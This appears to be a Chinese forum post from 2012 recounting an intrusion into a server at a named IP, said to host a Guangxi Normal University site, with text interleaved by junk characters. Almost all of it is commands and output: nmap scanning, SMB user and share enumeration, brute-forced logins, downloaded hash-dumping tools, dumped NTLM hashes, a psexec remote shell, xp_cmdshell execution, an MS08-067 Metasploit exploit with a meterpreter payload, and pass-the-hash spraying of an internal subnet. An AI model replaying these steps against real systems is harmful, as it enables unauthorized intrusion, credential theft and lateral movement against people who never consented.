广西师范网站http://202.103.242.241/8 I% q( ]; l0 `/ U* p
- z } e' H1 I* g' H5 k3 Hroot@bt:~# nmap -sS -sV 202.103.242.2412 J# j2 D+ l, N8 \
& l. C. [5 E% b$ z a( L: ~( ~Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST8 m9 Q% J; k1 `. i
+ S6 i3 ^# [6 q% }# o$ J. |/ U5 KNmap scan report for bogon (202.103.242.241)' C T4 i, ~; j) e
: S, h" F2 H1 k9 \
Host is up (0.00048s latency)." q- E( n. l( F$ v6 r7 |
9 \& H9 p0 a7 x5 z: }7 |: ?4 j" RNot shown: 993 closed ports
* J% V% Q$ V. D" L
/ a& P5 \& A- J h' L5 aPORT STATE SERVICE VERSION
/ K6 ^' r4 V# |3 Y
) u( l* y. b9 w" J% z* I, S$ Q y135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)( @& q+ r, d9 n1 S6 n
1 N; P% I3 O: w: H( r139/tcp open netbios-ssn
1 W. Q" E8 }! p- p/ [/ t: D) Y5 r* N$ U6 T
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
- A4 `8 K5 E/ q! Y- g9 U# S' e8 M/ A6 S
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)3 s0 A* k c8 t9 W1 \) M
+ r) V! O8 m" R# j5 `; X) N1026/tcp open msrpc Microsoft Windows RPC
% G9 x$ w. Q. E6 F& T' x' |4 Q1 L$ L7 U
3372/tcp open msdtc?
! t, q) P& a, r# D; y6 U
^! {4 L+ D6 d6 d, I" P3389/tcp open ms-term-serv?
5 g O. b. ]2 r9 @: u% ]& b8 M% O' s$ t. g6 }2 Y$ k
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :2 \- O' g2 ]6 t: [% @$ ^& ?
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
& l; N8 I3 ^; ^. x: K9 L& y( B4 O- E- m$ t
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions$ ^8 y% I8 z. t- q1 ~
6 b0 F9 Z+ O% F; zSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)- {" g% ~; k$ ~& `( G
# }+ p6 m0 n8 T( RSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
! y( r1 o/ I7 O) d y7 X
" w/ R% ]1 _4 xSF:ptions,6,”hO\n\x000Z”);) K6 j \0 V# R z" G Z [3 y
J1 z9 ^6 G1 m9 s
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)3 b. f4 A" a. y7 O* P) M% @
+ {7 e. R6 s5 {. y: EService Info: OS: Windows! F7 [0 R, @9 q& T) H
\ O% N+ W- r6 c- x b
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .$ t0 q& U( J3 R0 Y
7 c! { p9 w; Z3 D
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
+ _$ ]) |+ H7 J: \3 \3 J1 d5 | t7 y$ v8 Q( ?6 n( {! k
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
( o( m/ e( d$ N$ L4 V! @6 F; w$ E
' f7 i4 o2 h; N! @4 U-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse s% g* X( I1 i- `' @7 P) q
6 c8 |! \% T; w-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
8 \0 o* C8 v3 X' N5 M5 B. b
3 X8 W; j( B4 F' d-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
2 J! j! d E% U6 B
x7 b6 X8 t& p" t-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
9 [$ v8 I* n' Y/ Q* \; x( r2 l/ y
6 t. R7 i" @$ j: b J-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse) Y( m9 `0 D: S0 Q: O6 N
[ H$ G; O& i-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse+ f1 M9 X2 ]6 H# P4 a/ o: [( ^1 I
! k B3 e W# K6 u0 a
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
. T$ R% n. D" [" j% T2 Z* J! }6 O
8 \+ _+ n( x; L0 H; o-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse; |3 m/ b9 m* N+ G& m# Y
- W& `% K% T U6 k; m5 D
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse1 t0 B% |# o/ e# l |' n5 `+ W
$ r5 |5 u% p- [0 }3 m8 u- L$ O
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse8 y# C t! D$ r
, }8 V B, V$ T, @" J
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse3 N9 O( C9 D- C5 l
0 N7 F2 F/ j+ |) W( `1 x-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse( t* n* w2 O. g- f
" |- |8 Z8 H( N
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
7 p& _7 g5 M- }) U
* L6 w) v* E" X4 ~: F g% s V-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse8 q, G( U3 a2 D6 a+ K
4 j' p9 f8 u: D" l# ?' W-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse4 `% I7 |6 ]1 J* A0 I
w, T% ?% H, S# {' o8 U v% ?
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 2 R8 p7 Z5 O2 ~1 q0 E" _
: }* i) _7 @6 K1 r: x
//此乃使用脚本扫描远程机器所存在的账户名
& x- ?8 Z# ~4 @5 x1 }8 x! S' o
$ o8 _4 E* N6 @# qStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
1 {, ?# \* l; N3 t( k2 D: R: H8 }6 g+ P+ X0 `0 d$ d) _& g) }
Nmap scan report for bogon (202.103.242.241)+ u9 z" O% g `( ^* p( q2 A/ Z: O8 O
- g& f6 C. s( |2 @: Q- q5 z! z& NHost is up (0.00038s latency).
! A* h/ T$ F) u- m% Z5 d ^, a9 c4 o4 X' F4 |0 {. l- k# }
Not shown: 993 closed ports+ w3 l" w' ]% c# |, S
0 T( D4 f: l6 Q/ K% g6 |0 Y0 Q
PORT STATE SERVICE5 ~# y0 A/ m' l0 J# W2 `+ O5 I9 C
& h% h6 R8 Z: s) F( ?+ X: V135/tcp open msrpc& C4 L5 h5 f8 Y5 B' n L( D
$ z9 z" [, b* z! F! P8 U139/tcp open netbios-ssn, n1 y$ e$ P) X
9 i5 S0 x o4 \
445/tcp open microsoft-ds' J4 g& U& W. e' S+ }% D e5 \
3 P/ s! [/ N' w1 z% d: t8 h$ H
1025/tcp open NFS-or-IIS3 K2 Q5 x2 ^/ T, r+ Z ?7 y8 q) K
* p" |% a8 Z3 Y& Z; t! ]
1026/tcp open LSA-or-nterm3 N( {7 K8 H0 `) k9 ~
6 R/ B* Z$ \* w* o3372/tcp open msdtc6 Z, D9 r4 ?9 Y, g: A1 K3 z
8 E8 v" R6 I) d6 O* \3389/tcp open ms-term-serv
% c5 T+ l _; |) d- h9 z6 A5 Q+ h6 }$ u k' ^; ]7 {9 O6 A5 M
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
# O( o- s' z/ m1 K/ `- I% D6 h2 q9 {3 n) a& e5 o4 x y
Host script results:8 G( g% w& y9 V- a$ ]
6 q( e8 S9 { u6 y% s- \8 x/ ?| smb-enum-users:
5 ?0 k" |2 }4 C* y1 o/ X" S% l
/ n8 _7 f- y! T( D. ?|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果# e4 R! q* p! p: k f
' B* r2 A1 m# n PNmap done: 1 IP address (1 host up) scanned in 1.09 seconds. l2 }8 ^1 B& a) t0 o4 V) I: X
. ]1 r9 _( S/ X& g
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
4 g( ~; K: r4 V7 R
+ _$ Q% A4 C$ K/ b4 ^% m//查看共享- P* J! o3 u1 k. L
% H1 Q& p4 Q% I( r: ?Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST* h# b! T5 E" M$ L3 L, ~
; @) v! |7 U- F- G# s9 Z! ^0 V
Nmap scan report for bogon (202.103.242.241)
7 D, E& x2 f3 ?1 t
2 U8 {% S% X; U5 Y( r3 WHost is up (0.00035s latency).* b; t$ P8 l0 Y: u) q9 ~$ o( t
8 ^" r. M( d- b, w3 b% R! rNot shown: 993 closed ports
$ Y6 |( i3 J- w# b5 ]9 q4 t
9 U. a# P. h; d EPORT STATE SERVICE
5 X5 s+ m* b# K) E0 [9 o9 F6 q( A3 w) D ~+ ^
135/tcp open msrpc
% W5 U+ E& w9 W0 Z$ K
9 `& d( v8 K; L- L) G/ x139/tcp open netbios-ssn& U/ Q- p( z2 H: Y8 ^7 w) a
+ X# C `" f+ i6 F
445/tcp open microsoft-ds1 x0 P: y+ h/ Y. f
# _6 h( m: @$ x9 P6 K
1025/tcp open NFS-or-IIS
1 g& p& k2 o0 W/ y' ], T$ @' C, i$ j2 y; j8 c
1026/tcp open LSA-or-nterm! h1 h* Y9 ?! b c1 L; g
2 a" F o8 X* E: g+ \0 t Y
3372/tcp open msdtc
% y3 T; l+ d, Q, p- e0 m7 Z, m' A7 D# l/ E6 r% N
3389/tcp open ms-term-serv9 Y& x; T# c4 X7 t- R9 s
, z; F' J, G+ B( V5 S- s# d7 ]: l
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 e) r* L; K+ a3 I0 W
1 N* L& g+ o) ]: l& x- ?( ZHost script results:
0 O% l" ^' u. v& x' r2 w- h1 y1 `9 h1 ^$ _! X0 s6 `; F! T5 Q" |
| smb-enum-shares:
- {( w: A+ Z) _/ t U& b: X. l
/ ~) s. e. @: N$ b: V, T| ADMIN$' N, i% w# D4 E: m8 u
b3 I- f1 B$ S| Anonymous access: <none>$ z1 ~+ ~/ ?& }& O7 Y; U
z$ [0 z% F3 l2 |; H- I
| C$
& b+ W/ s- F- w( P2 V2 i( Q. S- Q
/ S* A. r8 E2 B6 p! m2 [; J| Anonymous access: <none>. N8 m; i- B" T! y& r$ H
0 C: H. W- r3 o S0 Y1 y$ C
| IPC$6 g* o& h3 V7 P7 o+ e5 g
7 b1 N5 h8 ? A( t; h/ \
|_ Anonymous access: READ
8 G# u7 f$ U- X( O, m; ]9 Z A) u
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
2 t& Q' q) |3 k: @/ t. m/ [% P# A# n1 S
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 & R8 S$ T) F9 Q& _
/ X8 k2 T. s& M" y# i6 G3 V) [//获取用户密码
9 A, g* ` i# s
7 h6 X! \/ T2 J. X& [; fStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
! D5 K) \: l0 P: P+ ] K4 l( j3 F3 s+ B3 ~
Nmap scan report for bogon (202.103.242.2418)" H8 |# z7 c, @8 A/ |; W, S
- t P* Q$ o$ V) R9 CHost is up (0.00041s latency).
( X4 x# c. m# M8 A) g$ l" H$ g3 ~, m0 n0 P/ I( K' u0 u
Not shown: 993 closed ports! t% Q& [$ n, ~0 ^, x/ Q" F
N. J8 V# A) M+ R4 B+ uPORT STATE SERVICE: Z& i/ j b' d* u
; T8 e; @* ]( @( \" g
135/tcp open msrpc6 O5 U3 _+ n* ]1 `1 E7 f6 t4 `0 z8 j
9 c3 ^& o$ a: b' y/ V9 R8 A) j139/tcp open netbios-ssn
8 H2 u/ B5 x# R3 U" B1 b5 m
$ T+ N% Z( n9 ?0 i* _4 ?* N# l445/tcp open microsoft-ds
. i5 y4 T; G; Y, C7 g% ?- \4 _$ T4 P O0 A4 O4 {' x! |
1025/tcp open NFS-or-IIS
, w5 `6 g& h1 n6 s) l% Y/ W2 |& W: W: Y/ Z3 R) J! i; S- X8 L6 W
1026/tcp open LSA-or-nterm1 D) N4 g: s- n/ e" I! U6 R+ t
6 N4 E+ j+ l0 B! `/ ^( }- W$ \
3372/tcp open msdtc' t p* H3 G+ x& C! r
: n* K6 t1 ?% ]4 ~' A
3389/tcp open ms-term-serv
w* r3 g, W @2 D0 O, R Q* o- k
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)6 S( [+ I( w7 t
& G$ ^; S5 T3 }% I
Host script results:3 |3 l! J' d3 M
( k; T, q$ N" ?7 w X4 R5 p: V
| smb-brute:
4 N/ e' G: H: B- Z; W: }
' w6 E4 A2 L: J Padministrator:<blank> => Login was successful5 U+ T8 ^& X+ B2 v- n2 o
+ c9 Y8 w( ~: c6 E( K) B7 F- u
|_ test:123456 => Login was successful
2 \* J) N- D; P
0 D* O; f3 S( i# _! MNmap done: 1 IP address (1 host up) scanned in 28.22 seconds7 f3 k# l. Z! C) O5 V0 x" V
# E" O0 P0 k. U
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
" ?8 e8 b+ S. q
% F. N- v6 ?# u. c, Sroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
# D% L) q) |% Q1 M! L( ^ U' z) e1 D2 }4 A# R7 J4 p5 F
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse$ p2 g; W4 B/ p& }
: B6 c' g! y- `' D: C, ?
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
/ A2 }1 T2 p1 z% h( ]* m
9 F4 F, D% i: l" K* g- U; pStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST6 P5 y. T2 w. T. o( M' i8 b4 D$ A
+ J$ G( H5 q$ ^! w8 z& o n% C hNmap scan report for bogon (202.103.242.241): u5 h* o# T, I3 G' h5 t# ^% w2 t
. k) J% |. B1 }: \) q* W
Host is up (0.0012s latency).' H% `4 n: |7 s" w! x g: f6 P0 i
$ _6 `; e! G9 I1 h* B. N q& k
PORT STATE SERVICE2 z8 V7 v9 W# B* n+ s+ Y. L7 ~
1 C! T7 z7 h, [3 m$ E& c
135/tcp open msrpc
/ Q/ S0 v/ r+ [" e2 U3 l+ X2 @7 x4 r e, @* Y
139/tcp open netbios-ssn1 ]* n/ ?/ W7 L) { E6 e# k
7 W0 F3 K: { [) Y8 g0 q( T445/tcp open microsoft-ds
/ Q9 X* w. k g; L0 N$ I
# a5 X# z" I4 ]1 ]+ FMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
1 o8 A5 [& v( J4 P. o. R) H1 o% x+ R$ q4 W- J2 I
Host script results:3 @4 P1 C+ O! L9 o' t
5 V1 |" D, h5 v* n( y
| smb-pwdump:+ h6 w) L% H4 U& V/ ?
2 k( x. P) l; Y5 }' K& g| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************9 L0 m. m1 \; E3 I9 y
3 \9 ^3 d& b* J E' x+ F| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
0 y5 `7 r: Z# s% A
7 E4 f- L/ v9 u/ g. f& B/ }| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
% `( l! z% R8 y6 Z' F1 l6 {/ c# q
/ `3 b4 U2 m8 p& o3 ||_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
8 a$ m' Y' H9 G. ^2 _
4 v0 U3 s5 k) R( H6 NNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
5 o$ T/ y2 Z' Q. G1 @) W) }7 e8 k
9 p1 F' R$ J# BC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell" c' H7 p8 T, {. y2 e
. V z: P9 \( }. r$ [1 d
-p 123456 -e cmd.exe" {" \& u; @: z8 R& U! r: D, o! x
$ Q; ]) |* j3 j% J7 rPsExec v1.55 – Execute processes remotely
K# w3 l" \! ~
) }6 F2 Q) g9 {$ I% GCopyright (C) 2001-2004 Mark Russinovich
; S1 n8 e( d6 @/ B2 b! L
, j5 _) f# U' G; qSysinternals – www.sysinternals.com. l) v8 T! K& C B3 k) V
+ C' m( O/ V/ [/ c3 m: y
Microsoft Windows 2000 [Version 5.00.2195]) B, l1 U1 i2 z5 w
4 Y8 c) X) ?" {2 J2 q! M4 w9 Z h
(C) 版权所有 1985-2000 Microsoft Corp.( `3 R, F7 Q/ G! o, S
% r; p; ~. \% J7 i$ T9 B( s0 ?C:\WINNT\system32>ipconfig
5 o, @1 q( R# J" |) L& [7 J" _3 G" W
Windows 2000 IP Configuration6 _7 l) s' b5 S$ ?* E- F
" o6 Z2 x. K- C! f' iEthernet adapter 本地连接:
8 ~9 H- z) ]2 f7 w: f8 F
- f) ~- @- R* Q) f# m. t6 \Connection-specific DNS Suffix . :+ u% C' ?$ O. N
, g0 D0 A! r) x6 Y- q5 G
IP Address. . . . . . . . . . . . : 202.103.242.241+ c; _& w! W6 u
( l5 s3 t3 `" N' y/ KSubnet Mask . . . . . . . . . . . : 255.255.255.0
8 z* f! j5 ~: l: q9 {/ Y$ q; m5 w* _ C3 U$ ^ F* z
Default Gateway . . . . . . . . . : 202.103.1.1
5 E* R: t4 b+ y ~
3 H' j. {- X$ i h2 \$ a; bC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令6 m% B8 q4 E+ \5 Y: _
2 k2 [+ L" v9 ^5 k. \root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞8 z( l& l6 X9 H% i
! E) a& ]- K+ ?- Y$ ^
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
; x! A( Z1 C9 ^& V4 Y- _- B9 a% o E4 B5 [
Nmap scan report for bogon (202.103.242.241)
/ X- [. W0 \7 I( V* A" J; q0 f, R; W3 P9 R7 {
Host is up (0.00046s latency).! ]4 [8 i: Q3 Z; q
, b1 {1 ]& v( w; k o% }; v2 F9 r
Not shown: 993 closed ports, z& f. |" a: b7 V
* E3 j/ \6 c* QPORT STATE SERVICE
' \) B& E" c! P+ o3 W8 ^) z" j# E) {6 J% T! K. d4 ^4 D
135/tcp open msrpc
! o3 Z; d& {. p! O3 ~8 u: E3 u8 Y2 F! H$ }* @/ ~8 p# L
139/tcp open netbios-ssn: w2 F# n) I8 Z+ p4 L2 V; I
8 P& z9 v3 V" [) t: B
445/tcp open microsoft-ds
! Q' w0 g4 @' ]8 Z! A. C/ G* `5 \9 D( c
1025/tcp open NFS-or-IIS* O- K7 F; x3 K& ^; n+ d
( K3 n0 s8 o* S* Q! X: L1 {3 V* U1026/tcp open LSA-or-nterm5 r' Z3 j C ^3 l+ {% X
- O* q7 l; f) v! v2 X3372/tcp open msdtc
% E; A+ g: C( I2 N$ ?+ I. C
& e, E0 Z5 |2 Z, O L$ t3389/tcp open ms-term-serv
! m8 f8 E4 [ v* o, Q. E6 Y, c% Q, `3 F
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
7 R- R8 h4 N* X3 ^
! O( q) m, F- o& OHost script results:0 c9 v. f3 x6 J" b0 J7 p
|) ^7 b) B& N& T
| smb-check-vulns:0 C- u" \( a2 h' s& S# J& t/ M
& K. ~# @0 U1 h8 n$ A6 D|_ MS08-067: VULNERABLE q3 t" p* Y( k
1 Q5 l2 y5 E5 k4 S& }/ _: w6 S
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
- t8 \, }* R/ U( ^% y1 }' ^
" P1 h6 }7 D& l+ T: O- \root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出" N% F' ]8 |# t8 W5 B2 k$ @
5 J2 R4 t$ P" F, O+ a& w6 K# zmsf > search ms08
* a. B, T7 R2 [; `4 Y$ O
/ U7 X# q( D1 x& ]msf > use exploit/windows/smb/ms08_067_netapi
$ \$ ~6 f% l0 e2 a4 W
) g+ E: K1 A( lmsf exploit(ms08_067_netapi) > show options& {5 Y+ `: p* T d6 X9 c9 E# y
3 a# G, |1 A9 Q: h8 L
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241 V0 d. R' f i
* O- A8 t1 v5 M! \2 b0 R8 d) p# t
msf exploit(ms08_067_netapi) > show payloads
1 y% H) U) K4 h k# l! N4 ?4 u
# a: {( S, n1 s9 R3 t8 L6 B# z, `msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
* x; P: s/ G, G* G% O: N1 G u, l) F/ e+ r% J ]) n0 R- Z9 y" E. B/ h
msf exploit(ms08_067_netapi) > exploit- U) q: U" G/ N$ y) s2 j# n
( Y2 |% A$ M# R5 a8 H4 i Tmeterpreter >
- [& J8 s5 {4 Z" F2 }" c
: V) u. B$ ]) k+ yBackground session 2? [y/N] (ctrl+z)
: W! }9 A5 `5 D' w, a. [2 ~1 U4 e( u3 y9 y+ S0 q
msf exploit(ms08_067_netapi) > sessions -l, I8 ~: f# L/ Y( e5 K9 q7 P2 r
* e4 t, w5 D0 o, ~
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
' O3 C% @' }) y, g# Q! V3 w1 q+ @. ~# n/ Q0 K/ V6 I7 R
test
4 j+ F3 h e. Z
9 o& x; ~$ ?0 q+ x$ {4 Y7 u! ladministrator
2 C, |6 u7 B t! T
9 a& V6 g! l% Y7 I& W: K4 uroot@bt:/usr/local/share/nmap/scripts# vim password.txt; Y3 |0 m3 v# p1 X
' M6 `+ P5 P$ q' k: b, G: T44EFCE164AB921CAAAD3B435B51404EE
1 S( E2 C# C0 Z, d4 A! m
, E6 w% J& _5 b! I: sroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 # w$ ?2 ]) F$ k" H
; J) `$ W' M2 o0 K* O6 z //利用用户名跟获取的hash尝试对整段内网进行登录
3 b {4 I6 `8 A3 Z) P& ^
, q) ~- N' w9 P: }" z. W/ XNmap scan report for 192.168.1.105+ |+ o; b; u) W8 h4 r3 n
( J: C0 y/ n- T8 m8 X' b) P
Host is up (0.00088s latency).
+ {+ b0 e1 B; s( J9 a0 F- X, O
! ~) B, V6 a4 i7 h, kNot shown: 993 closed ports: h5 d7 M' X3 q0 \5 x8 g8 ?7 B6 o
7 G1 P/ V- h+ Z5 c8 J0 R
PORT STATE SERVICE( n" [/ `2 I4 ^1 x9 {
9 j4 q% m: V! r7 M' i' f, l135/tcp open msrpc, C" {: C9 k8 J& ~
" `1 \4 H, e4 v8 h( Z8 q
139/tcp open netbios-ssn
1 v$ N8 Y% N: |# m; O) o: u5 g- z- l, s+ O3 K' X$ C% i
445/tcp open microsoft-ds
/ G2 D0 j% I6 R6 N3 g/ y9 d7 `
" U/ P) s5 Y& x; {1025/tcp open NFS-or-IIS
7 }$ Z- s7 I5 B" T; W* z! a ]! l" q% y% S F8 x* i% I4 E: Q- b
1026/tcp open LSA-or-nterm) [( x6 O7 W/ J
4 T4 \: t% [1 M- u! R D3372/tcp open msdtc% Q V" S3 Q# }% G
9 g0 K- E0 }# u5 D0 E4 C5 A
3389/tcp open ms-term-serv. b2 s* g5 G( d7 }- W8 g
9 e+ M2 _4 ^6 a2 `: Q. n6 o+ y& O
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
9 o, J, g: z. ?( u8 n! x& t* D, u2 t" f3 K! ]& e
Host script results:4 b4 A$ V3 `, ?! O4 ~1 `
5 G, }2 `( t3 h4 G: p" C8 Z
| smb-brute:4 R) A& _: m* x$ ~) G8 _3 A
`5 n' S! n' q) y0 r+ v. o6 u5 V, v
|_ administrator:<blank> => Login was successful" x) Y J! A7 B3 @; C
3 Y+ ?' c& l$ D8 v
攻击成功,一个简单的msf+nmap攻击~~·1 i* \: U. W; I
! q# X6 h& m1 g6 S: P |
发表于 2012-12-4 12:46:42
收藏
支持
反对